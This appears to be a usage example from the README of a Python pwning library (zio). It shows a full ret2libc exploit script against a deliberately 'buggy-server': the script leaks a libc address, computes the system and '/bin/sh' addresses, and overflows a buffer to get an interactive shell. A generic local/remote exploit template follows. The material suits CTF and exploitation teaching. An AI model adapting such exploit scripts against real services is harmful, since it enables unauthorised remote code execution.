1 from zio import *
 2 io = zio('./buggy-server')
 3 # io = zio((pwn.server, 1337))
 4 
 5 for i in xrange(1337):
 6     io.writeline('add ' + str(i))
 7     io.read_until('>>')
 8 
 9 io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa\ninfo " + "A" * 49 + "\nshow\n")
10 io.read_until('A' * 49)
11 libc_base = l32(io.read(4)) - 0x1a9960
12 libc_system = libc_base + 0x3ea70
13 libc_binsh = libc_base + 0x15fcbf
14 payload = 'A' * 64 + l32(libc_system) + 'JJJJ' + l32(libc_binsh)
15 io.write('info ' + payload + "\nshow\nexit\n")
16 io.read_until(">>")
17 # We've got a shell;-)
18 io.interact()

 1 from zio import *
 2 
 3 if you_are_debugging_local_server_binary:
 4     io = zio('./buggy-server')            # used for local pwning development
 5 elif you_are_pwning_remote_server:
 6     io = zio(('1.2.3.4', 1337))           # used to exploit remote service
 7 
 8 io.write(your_awesome_ropchain_or_shellcode)
 9 # hey, we got an interactive shell!
10 io.interact()